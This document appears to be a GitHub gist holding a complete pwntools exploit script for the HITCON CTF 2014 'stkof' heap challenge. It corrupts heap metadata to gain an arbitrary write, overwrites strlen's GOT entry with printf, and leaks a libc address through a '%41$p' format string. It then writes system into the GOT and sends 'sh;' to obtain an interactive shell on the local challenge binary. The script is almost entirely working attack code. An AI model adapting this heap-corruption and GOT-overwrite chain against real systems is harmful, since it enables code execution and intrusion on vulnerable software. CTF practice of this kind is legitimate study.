
@icchy
Created Apr 28, 2017
HITCON CTF 2014 stkof
#!/usr/bin/env python
from pwn import *
# pwntools context for the target: 64-bit Linux, verbose log output.
context(os='linux', arch='amd64')
context.log_level = 'debug'
# Endpoints: 'r' mode connects to RHOST/RPORT, 'l' mode to LHOST/LPORT.
RHOST, RPORT = "127.0.0.1", 10080
LHOST, LPORT = "127.0.0.1", 10080
# Local libc (used for symbol offsets) and the challenge binary.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./a679df07a8f3a8d590febad45336d031-stkof')
def section_addr(name, elf=elf):
    """Return the ``sh_addr`` header field of the section called *name*.

    *elf* defaults to the module-level challenge binary; any pwntools
    ``ELF`` object may be passed instead.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
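conn = None
# Target selection from argv[1]: 'r' remote host, 'l' local listener,
# 'd' run under gdb, no argument = plain local process.  Any other value
# is a usage error; previously it silently left ``conn`` as None and the
# script crashed on the first ``conn.sendline``.
mode = sys.argv[1] if len(sys.argv) > 1 else None
if mode == 'r':
    conn = remote(RHOST, RPORT)
elif mode == 'l':
    conn = remote(LHOST, LPORT)
elif mode == 'd':
    # gdb script: break at main (or the entry point when main is not
    # exported) and continue.
    execute = """
# set environment LD_PRELOAD=
b *{0}
c
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint))
    conn = gdb.debug(['./a679df07a8f3a8d590febad45336d031-stkof'], execute=execute)
    # Discard the first line the process prints under gdb -- presumably a
    # banner; confirm against the binary's output.
    conn.recvline()
elif mode is None:
    conn = process(['./a679df07a8f3a8d590febad45336d031-stkof'])
    # conn = process(['./a679df07a8f3a8d590febad45336d031-stkof'], env={'LD_PRELOAD': ''})
else:
    sys.exit("usage: {0} [r|l|d]".format(sys.argv[0]))

# preparing for exploitation
log.info('Pwning')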
def alloc(size):
    """Send command "1" followed by *size* on the module-level ``conn``.

    Returns the integer in the first reply line, after consuming the
    trailing "OK\\n"; returns -1 when that line contains "FAIL".
    """
    for line in ("1", str(size)):
        conn.sendline(line)
    reply = conn.recvline()
    if "FAIL" in reply:
        return -1
    conn.recvuntil("OK\n")
    return int(reply)
def read(idx, data):
    """Send command "2", *idx*, ``len(data)`` and then *data* itself.

    Uses the module-level ``conn``.  Returns False when the reply line
    contains "FAIL", True when it contains "OK", and None otherwise.
    """
    for line in ("2", str(idx), str(len(data))):
        conn.sendline(line)
    conn.send(data)
    reply = conn.recvline()
    if "FAIL" in reply:
        return False
    if "OK" in reply:
        return True
    return None
def free(idx):
    """Send command "3" followed by *idx* on the module-level ``conn``.

    Returns False when the reply line contains "FAIL", True when it
    contains "OK", and None otherwise.
    """
    for line in ("3", str(idx)):
        conn.sendline(line)
    reply = conn.recvline()
    if "FAIL" in reply:
        return False
    if "OK" in reply:
        return True
    return None
# NOTE(review): every address and offset below (0x602100, 0x602140, the
# +245 libc offset) is tied to this challenge binary and the local libc
# build loaded above; they are not portable.
# Heap set-up: 0x20 allocations of 10 bytes, then free index 2.
for _ in range(0x20):
    alloc(10)
free(2)
# Written into index 1: 0x18 filler bytes, a 0x21 word and the pointer
# 0x602100-0x8 (pwntools ``pack`` uses the amd64 context, 8-byte words).
exploit = "A"*0x10 + "A"*8 + pack(0x21)+pack(0x602100-0x8)
read(1, exploit)
alloc(10) # fastbins unlink attack
idx = alloc(10) # 0x602100-0x8
# Filler from 0x602108 up to and including 0x602140, then the address of
# strlen's GOT slot.
pad = "A"*(0x602140 - 0x602108 + 0x8)
read(idx, pad+pack(elf.got['strlen']))
read(1, pack(elf.symbols['printf'])) # GOT overwrite
# Format string "%41$p" placed in index 3; commands "4" then "3" trigger
# the output that is parsed as a hex pointer below.
read(3, "%41$p\n\x00")
conn.sendline("4")
conn.sendline("3")
# The leaked pointer is taken to be __libc_start_main + 245 in the loaded
# libc; that anchors libc_base and hence system.
libc_start_main = int(conn.recvline(), 16)
libc_base = libc_start_main - (libc.symbols['__libc_start_main'] + 245)
libc_system = libc_base + libc.symbols['system']
log.info('libc_system: 0x{0:x}'.format(libc_system))
# Same write sequence again, this time storing the system address in
# strlen's GOT slot.
read(idx, pad+pack(elf.got['strlen']))
read(1, pack(libc_system)) # GOT overwrite
read(3, "sh;")
conn.sendline("4")
conn.sendline("3")
conn.interactive()